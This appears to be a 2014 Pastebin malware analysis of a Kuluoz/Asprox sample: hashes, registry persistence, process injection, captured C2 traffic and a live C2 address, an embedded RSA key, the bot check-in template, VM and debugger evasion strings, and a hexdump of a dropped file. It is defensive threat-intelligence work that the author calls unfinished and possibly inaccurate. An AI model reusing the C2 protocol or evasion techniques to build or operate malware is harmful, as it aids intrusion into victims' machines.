API tools faq
paste
Advertisement
MalwareMustDie

Kuluoz - Latest Version | Binary DUMP Analysis

MalwareMustDie
Jan 14th, 2014
2,060
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.02 KB | None | 0 0
raw download clone embed print report
  1. -----------------------------------------------------------
  2. Sample : sample.exe
  3. MD5 : 0d173908dee410a2a42a983ff77a7264
  4. SHA256 : fef7a0185f3cc2467642f08156f6670ab8cd24b1201e864b878c905aee8514dc
  5. REF : https://www.virustotal.com/en/file/fef7a0185f3cc2467642f08156f6670ab8cd24b1201e864b878c905aee8514dc/analysis/
  6. http://www.threatexpert.com/report.aspx?md5=0d173908dee410a2a42a983ff77a7264
  7. Date: Tuesday January 14 2014 -- 20:25:28 +02:00
  8. -----------------------------------------------------------
  9.  
  10. // Autostart:
  11. <8e0374 >>> Software\Microsoft\Windows\CurrentVersion\Run
  12.  
  13. Injects files into Windows application Hide sources
  14. Source: C:\WINDOWS\system32\svchost.exe
  15. Injected file: C:\WINDOWS\system32\notepad.exe
  16.  
  17. //Wellknown string :-)
  18. 412155 >>> C KEY----- Unknown ERROR! Please wait and try again later.
  19.  
  20. // PCAP in ASCII..
  21.  
  22. // REQUEST:
  23. GET /DCC523DC84BAA5FDF7856F98F7905F8883B2C863C0 HTTP/1.1
  24. Accept: */*
  25. Content-Type: application/x-www-form-urlencoded
  26. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
  27. Host: 66.255.131.164:8080
  28. Content-Length: 321
  29. Cache-Control: no-cache
  30.  
  31. € G嘸V畳PD・栃^MヒV_瓶52&桒I注
  32. 浩v<|モタqョZ柁疊lャXc・貌ス慌J・ェC56n詆*紮テ %マッ.・イツー・]テsー0
  33. 疊u.・6フ]「花yセワYオ〔?ケ aナテチX磧d卍7緘藪F[oミ7ハ峯.盧裸ィ莇!wゥ萠アニ簫ヤ癪|テq<)U゙越bヤメヌ0オ゚ハ・鮪@・アォwg
  34. !裾*#)参H・ォ些+Uウ4ck市[02ノ鍰・゙腑)琵㏍・・'t﨏キ孅・アサ恷M・zムヲ!薔剿eカC・・ユRヒユ 6 6 !・Ex}{ヨノS E (・@ @ナqBΖタィ ・ャ晧te-,モP=>・ ・ユR忘
  35. レ レ !・Ex}{ヨノS E フ・@ @テフBΖタィ ・ャ晧te-,モP=>・
  36.  
  37. Data Raw: 80 00 00 00 47 9a 7e 56 f1 86 8f f4 50 f8 57 44 fb 2d 93 c8 5e 4d cb 56 5f 95 72 35 32 26 fa e3 49 92 0d 8d 5f 76 3c 7c d3 c0 71 ae 5a 91 c6 e1 67 6c 04 ac 58 63 fa 38 96 65 bd 8d 51 4a 88 65 aa 43 17 f1 d8 35 1d 36 6e e6 68 2a e3 46 1c c3 0b 25 fd f8 8e 1f cf af 2e 98 3d b2 c2 b0 fc c8 5d c3 73 b0 08 f1 5e 30 0a e1 67 75 7f 2e fc bf f7 a0 36 cc 5d a2 89 d4 79 be f0 e9 dc f4 f1 59 b5 81 6b 3f b9 00 00 00 61 a0 c5 c3 c1 03 58 e2 40 64 99 c2 37 e3 67 fe 1a 1a 03 e5 4d 46 81 6d 04 6f d0 37 ca 95 f5 18 f4 5a 1d 2e e1 b8 97 87 a8 e4 b4 21 77 a9 e4 cc b1 18 c6 e2 d2 d4 7f f7 80 e1 9b 7c c3 01 0e 71 3c 29 55 de 89 7a 1b 62 d4 d2 c7 30 b5 df ca ea be 96 8e 0e 40 84 13 b1 ab 77 67 0d 21 90 9e 2a f1 9c 12 23 f5 65 29 15 8e 51 48 97 19 ab 8d b1 2b 55 b3 34 63 6b 8e 73 19 5b 30 fe f4 a4 32 08 c9 ee c3 1b f1 2b de fd e4 44 29 94 fa 87 83 17 86 c7 e8 28 27 74 f5 b4 fa 9b b7 9b 70 1c ef b3 b1 bb 9c 8e 4d e8 14 7a d1 0f a6 f8 41 21 f1 ea e5 4b 99 96 65 b6 43 eb 76
  38.  
  39.  
  40. // RESPONSE
  41.  
  42. HTTP/1.1 200 OK
  43. Server: nginx/1.2.6
  44. Date: Tue, 14 Jan 2014 10:51:23 GMT
  45. Content-Type: text/html; charset=utf-8
  46. Transfer-Encoding: chunked
  47. Connection: close
  48.  
  49. f5
  50. € ミLHb」
  51. レ・・Xt!RF億・リモ・)釣w鎗ワ@ ts婆a苞:ZCq\゙,驢・GQサc(蘂^タhk攪_yテoオ 低q,S何*・ヤ勀ク匠酣ヘ・レ|舶a。愚トウ・ト5・掵ヌ{C ・=P€m aナテチX磧dム・喩6Zオ]・ュ痿ナAjオlー汰柀」
  52. コ0!{h-Bトェォゥ・メpQモMFkR・/サvラ・濶・ュ7\セW8p1募ソルタ*ー7*:_鰭ソロ|・
  53. 0・ユR秦
  54. < < }{ヨノS !・Ex E (テ@ €oュタィ BΖャ親-,モ晧・P[Oカ ・ユR
  55. 6 6 !・Ex}{ヨノS E (・@ @ナoBΖタィ ・ャ晧・e-,ヤP=>・ ・ユRルa
  56. < < }{ヨノS !・Ex E (ナ@ €oォタィ BΖャ親-,ヤ晧・P[Oオ
  57.  
  58.  
  59. Data Raw: 66 35 0d 0a 80 00 00 00 d0 4c 48 62 a3 0a da 83 e3 89 3a 58 74 21 52 46 89 ad 88 fd 7f d8 d3 84 26 29 92 de 77 91 99 dc 40 0c 74 73 94 6b 61 e4 9a 3a 5a 43 06 71 5c de 2c e9 86 ee 1b 47 51 bb 63 f9 c0 28 e5 41 5e c0 68 6b 9d 98 5f 79 c3 6f b5 20 f9 e1 92 e1 71 2c 53 89 bd 15 2a 92 2d d4 fa 87 b8 8f a0 e7 c5 cd 85 18 da 7c 94 95 61 a1 8b f0 c4 b3 ec 0f c4 35 87 fb 9d 7d c7 7b 43 02 00 e4 21 3d f0 85 50 80 6d 00 00 00 61 a0 c5 c3 c1 03 58 e2 40 64 d1 f3 2c 9a 67 fe 36 5a 03 b5 5d f9 25 ad e1 7e fd c5 41 6a b5 6c b0 f8 9e 91 bf fa e4 a3 0d ba 30 21 7b 68 2d 1f 42 18 c4 aa ab a9 96 13 d2 70 51 d3 4d 46 6b f9 45 52 8a 2b 2f bb f3 7a 14 76 d7 0f a5 e8 89 f3 2d ff ad 37 5c be 57 38 70 31 95 e5 bf d9 c0 2a b0 37 2a 3a 5f 95 68 01 fe bf db 7c ef 0d 0a 30 0d 0a 0d 0a
  60.  
  61.  
  62. // URL Decoded:
  63. POST /DCC523DC84BAA5FDF7856F98F7905F8883B2C863C0 HTTP/1.1
  64.  
  65. 2f 69 6e 64 65 78 2e 70 68 /index.ph
  66. 70 3f 72 3d 67 61 74 65 p?r=gate
  67.  
  68. PS: They decoded those in memory too, lame:
  69. 8e06b4 >>> /index.php?r=gate
  70.  
  71. // Testing CNC..
  72. URL: h00p://66.255.131.164:8080/index.php?r=gate <=== Alive!!!!!!!!!!
  73. Tue Jan 14 20:05:53 JST
  74. 2014|66.255.131.164|uslec-66-255-131-164.cust.uslec.net.|1785 |
  75. 66.255.128.0/18 | AS-PAETEC-NET | US | USLEC.NET | TDARX INC
  76. (Hello USA..)
  77.  
  78. $ ping 66.255.131.164
  79. PING 66.255.131.164 (66.255.131.164): 56 data bytes
  80. 64 bytes from 66.255.131.164: icmp_seq=0 ttl=44 time=305.283 ms
  81. 64 bytes from 66.255.131.164: icmp_seq=1 ttl=44 time=189.028 ms
  82. [...]
  83.  
  84. $ NMAP BLAH..
  85. Nmap scan report for uslec-66-255-131-164.cust.uslec.net (66.255.131.164)
  86. Host is up (0.19s latency).
  87. Not shown: 996 closed ports
  88. PORT STATE SERVICE
  89. 22/tcp open ssh
  90. 53/tcp open domain
  91. 8080/tcp open http-proxy
  92. 9102/tcp open jetdirect
  93.  
  94.  
  95. // How SAMPLE is using encryption:
  96.  
  97. // Source: C:\WINDOWS\system32\svchost.exe
  98. // Code function: 1_2_008D23D0 (Binary ADDRESS)
  99. CryptEncrypt,malloc,
  100. CryptEncrypt,CryptCreateHash,
  101. CryptHashData,
  102. CryptVerifySignatureA,malloc,free,
  103. CryptDestroyHash,
  104.  
  105. // The trace of Public key dumped from memory:
  106. 8e3040 >>> -----BEGIN PUBLIC KEY-----
  107. MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUAUdLJ1rmxx+bAndp+Cz6+5I
  108. Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqw
  109. jwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U
  110. 00SNFZ88nyVv33z9+wIDAQAB -----END PUBLIC KEY
  111.  
  112.  
  113. // Testing interesting strings decrypted in registry:
  114. 8e041c >>> For base!!!!!
  115. 8e1114 >>> You fag!!!!!
  116. ^^^ It looks like so many moronz like to use this "fag" words..
  117. decoding method works.
  118.  
  119. // The template data sent to botnet:
  120. <knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport>
  121. <time>%d</time><version>%d</version><status>%d</status><debug>%s</debug><
  122. /knock>
  123.  
  124. // PS: I think I fouund the trace lead to the CODER of Kuluoz:
  125. C:\Users\DmitryHELL\Documents\SysIQUA\loader_1.4
  126. r\loader_v4\loader_v3\Release\
  127. <unixfreaxjp> ^^^^ See that "DmitryHELL" ?
  128.  
  129.  
  130. // notes:
  131.  
  132. Herrcore decoded nicely: http://herrcore.blogspot.ca/2014/01/inside-new-asproxkuluoz-october-2013.html
  133. tHIS sample is the same blocks, so they dont upgrade it yet :-)
  134. Quoted "Examining the response we can see the first 4 bytes of the
  135. response body represent the length of the RSA signed hash of the data
  136. (little endian) 0x00000080. This is followed by the RSA signed hash. The
  137. RSA signed hash is followed by another 4 bytes that represent the length
  138. of the RC4 encrypted data 0x00000069. These 4 bytes are then followed by
  139. the RC4 encrypted data." <-- this should work.
  140.  
  141. // PCAP download:
  142. <unixfreaxjp> here's the PCAP: https://www.mediafire.com/?f0qsp4exa1azfgf
  143.  
  144. // Kernel debugger checks:
  145.  
  146. C:\WINDOWS\system32\svchost.exe System information
  147. queried: KernelDebuggerInformation
  148.  
  149. // Vbox checks:
  150.  
  151. svchost.exe : VBoxTray.exe
  152. svchost.exe : HARDWARE\ACPI\DSDT\VBOX__
  153. svchost.exe : vmusrvc.exe
  154. svchost.exe : VMwareDragDetWndClass
  155. svchost.exe : VBoxService.exe
  156.  
  157. VM detection calls:
  158.  
  159. 916): 8e0aa8 >>> vmtoolsd.exe
  160. 957): 8e0b4c >>> VMware
  161. 962): 8e0b94 >>> VMware
  162. 1093): 8e0b14 >>> vmsrvc.exe
  163. 1171): 8e0bcc >>> VMware
  164. 1208): 8e0b08 >>> vmusrvc.exe
  165. 1262): 8e0a70 >>> VMwareDragDetWndClass
  166. 1314): 8e0a88 >>> VMwareSwitchUserControlClass
  167.  
  168. // Sandbox evasion, long sleeps:
  169.  
  170. Source: C:\WINDOWS\system32\svchost.exe
  171. Thread delayed: delay time: -600
  172.  
  173.  
  174. // Detect wireshark:
  175.  
  176. (1351): 8e0908 >>> wireshark.exe
  177.  
  178. // etc evasion:
  179.  
  180. 8e08a4 >>> SELECT * FROM FirewallProduct
  181. 8e07e0 >>> SELECT * FROM AntiVirusProduct
  182.  
  183. // DLL loaded:
  184.  
  185. /// KNown....
  186.  
  187. (3): WINSPOOL.DRV
  188. (4): ShimEng.dll
  189. (5): WINMM.dll
  190. (6): MSACM32.dll
  191. (7): UxTheme.dll
  192. (8): kernel32.dll
  193. (13): comdlg32.dll
  194. (14): ADVAPI32.dll
  195. (15): RPCRT4.dll
  196. (16): Secur32.dll
  197. (18): msvcrt.dll
  198. (19): GDI32.dll
  199. (20): USER32.dll
  200. (21): SHLWAPI.dll
  201. (22): SHELL32.dll
  202. (30): ole32.dll
  203. (31): OLEAUT32.dll
  204. (33): VERSION.dll
  205. (34): USERENV.dll
  206.  
  207. // etc DLL...dunno these..
  208.  
  209. (17): C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll 773A0000 1060864
  210. (24): C:\WINDOWS\system32\shimeng.dll 5CF00000 155648
  211. (26): C:\WINDOWS\AppPatch\AcGenral.dll 3D0000 1855488
  212. (27): C:\WINDOWS\AppPatch\AcGenral.dll 3D0000 1855488
  213. (28): C:\WINDOWS\AppPatch\AcGenral.dll 6FD90000 1875968
  214. (29): C:\WINDOWS\system32\winmm.dll 76AF0000 188416
  215. (32): C:\WINDOWS\system32\msacm32.dll 77BB0000 86016
  216. (35): C:\WINDOWS\system32\uxtheme.dll 5B0F0000 229376
  217. (37): C:\WINDOWS\system32\imm32.dll 360000 110592
  218. (38): C:\WINDOWS\system32\imm32.dll 360000 110592
  219. (39): C:\WINDOWS\system32\imm32.dll 76330000 118784
  220. (43): C:\WINDOWS\system32\shell32.dll
  221.  
  222. // Variable template list (forensics)
  223.  
  224. (140): 41f215 >>> %Xe`
  225. (153): 41b7fa >>> %.ZM`
  226. (262): 41dd5d >>> r"%`
  227. (293): 422e2c >>> SymAgc Gain %f
  228. (577): 9f0a3 >>> ]=%1
  229. (664): 9f0e3 >>> ]=%1
  230. (698): 9f0a5 >>> %102
  231. (969): 8e0298 >>> http://%[^:]:%d/%s
  232. (1085): 8e0403 >>> ]=%1
  233. (1182): 8e0405 >>> %102
  234. (1193): 8e076c >>> %d.%d x%d
  235. (1258): 8e043c >>> %1024[^=]=%1024[^;]
  236. (1261): 8e0443 >>> ]=%1
  237. (1318): 8e06e8 >>> %[^:]:%d
  238. (1351): 8e03fc >>> %1024[^=]=%1024[^;]
  239.  
  240. // Security bearch attempts..
  241.  
  242. (423): 100357e >>> SetSecurityDescriptorGroup
  243. (428): 100215c >>> CoInitializeSecurityParam
  244. (440): 100359c >>> SetSecurityDescriptorOwner
  245. (451): 10035ba >>> InitializeSecurityDescriptor
  246. (468): 100333e >>> CoInitializeSecurity
  247. (473): 100354e >>> SetSecurityDescriptorDacl
  248. (517): 1003942 >>> NtQuerySecurityObject
  249. (544): 1003a32 >>> RtlGetDaclSecurityDescriptor
  250.  
  251. // RAM Forensics Registry calls:
  252.  
  253. // Aggressives:
  254.  
  255. 411b2c >>> RegDeleteValueA
  256. a09bc >>> RegDeleteValueA
  257. 8e1d1c >>> RegDeleteValueA
  258.  
  259. 411a9e >>> RegCreateKeyA
  260. a092e >>> RegCreateKeyA
  261. 8e1c8e >>> RegCreateKeyA
  262.  
  263. // Points;
  264.  
  265. Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
  266.  
  267. Software\Microsoft\Windows NT\CurrentVersion\Svchost
  268. Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
  269. Software\Microsoft\Windows\CurrentVersion\Run
  270. Software\Microsoft\Windows NT\CurrentVersion
  271.  
  272. SYSTEM\CurrentControlSet\Services
  273. SYSTEM\CurrentControlSet\services\Disk\Enum
  274. SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00
  275. SYSTEM\CurrentControlSet\Enum\PCI\VEN_15AD&DEV_0774&SUBSYS_074015AD&REV_00
  276. SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00
  277. SYSTEM\CurrentControlSet\Enum\PCI\VEN_5333&DEV_8811&SUBSYS_00000000&REV_00
  278.  
  279. HARDWARE\ACPI\DSDT\AMIBI
  280. HARDWARE\ACPI\DSDT\VBOX__
  281. HARDWARE\ACPI\DSDT\PTLTD__
  282. HARDWARE\DESCRIPTION\System\BIOS
  283. HARDWARE\DESCRIPTION\System\BIOS
  284. HARDWARE\DESCRIPTION\System\BIOS
  285. HARDWARE\DESCRIPTION\System\BIOS
  286.  
  287.  
  288. // RAM Forensics - System Information Grabs PoC
  289.  
  290. // Info:
  291.  
  292. 8e1300 >>> bb10bd00-c135-11e2-b7ac-005056c00008
  293. 8e0a24 >>> 99929D61-1338-48B1-9433-D42A1D94F0D2
  294. 8e09cc >>> 99929D61-1338-48B1-9433-D42A1D94F0D2-x64
  295. 8e09f8 >>> 99929D61-1338-48B1-9433-D42A1D94F0D2-x32
  296. 8e0a24 >>> 99929D61-1338-48B1-9433-D42A1D94F0D2
  297. 8e12d8 >>> c540500f-c135-11e2-b348-005056c00008
  298.  
  299. // Calls:
  300.  
  301. a06ea >>> GetVolumeInformationW
  302. 8e1d5a >>> LookupAccountNameA
  303. 8e1d70 >>> GetUserNameA
  304. 8e0bb8 >>> SystemProductName
  305. 8e08e0 >>> displayName
  306. 8e0dac >>> SystemManufacturer
  307.  
  308. // Drops: (this is under check..something looks went wrong during the drop captures..)
  309.  
  310. MD5: 7BF167A337B794CC26FF3C2DFFD68113
  311. SHA: 6077966E1FAA4F92E1137AB1F9177E72DDD4AA40
  312.  
  313. 0000 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 ........H.......
  314. 0010 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 ................
  315. 0020 80 BD A8 AF 8A 7D C9 11 BE F4 08 00 2B 10 29 89 .....}......+.).
  316. 0030 01 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 .....]..........
  317. 0040 2B 10 48 60 02 00 00 00 05 00 0B 07 10 00 00 00 +.H`............
  318. 0050 8B 00 3B 00 02 00 00 00 B8 10 B8 10 7A 38 00 00 ..;.........z8..
  319. 0060 01 00 00 00 01 00 01 00 36 00 61 20 22 FA CF 11 ........6.a "...
  320. 0070 98 23 00 A0 C9 11 E5 DF 01 00 00 00 04 5D 88 8A .#...........]..
  321. 0080 EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 ........+.H`....
  322. 0090 0A 06 00 00 D0 FA 0F 00 4E 54 4C 4D 53 53 50 00 ........NTLMSSP.
  323. 00A0 01 00 00 00 B7 B2 08 E2 0D 00 0D 00 2E 00 00 00 ................
  324. 00B0 06 00 06 00 28 00 00 00 05 01 28 0A 00 00 00 0F ....(.....(.....
  325. 00C0 39 32 37 35 33 37 41 52 42 45 49 54 53 47 52 55 927537ARBEITSGRU
  326. 00D0 50 50 45 05 00 10 03 10 00 00 00 64 00 48 00 02 PPE........d.H..
  327. 00E0 00 00 00 B8 10 B8 10 0A 06 00 00 D0 FA 0F 00 4E ...............N
  328. 00F0 54 4C 4D 53 53 50 00 03 00 00 00 00 00 00 00 48 TLMSSP.........H
  329. 0100 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00 48 .......H.......H
  330. 0110 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00 48 .......H.......H
  331. 0120 00 00 00 00 00 00 00 48 00 00 00 35 C2 88 E2 05 .......H...5....
  332. 0130 01 28 0A 00 00 00 0F .(.....
  333.  
  334. // in Text..Quicky
  335.  H  クク   €スィッ笠ノセ・ +)・ ]・・ノ溯 +H` 
  336.  ・;  ククz8    6 a "昕・ ノ裃 ]・・ノ溯 +H`
  337.  ミ・ NTLMSSP  キイ・
  338. .   ( (
  339. 927537ARBEITSGRUPPE  d H  クク
  340.  ミ・ NTLMSSP  H H H H H H 5ツ遺(
  341.  
  342.  
  343. ( still working on this.. not final.. may contain mistakes & inaccuracies)
  344.  
  345. ----
  346. #MalwareMustDie
  347. @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!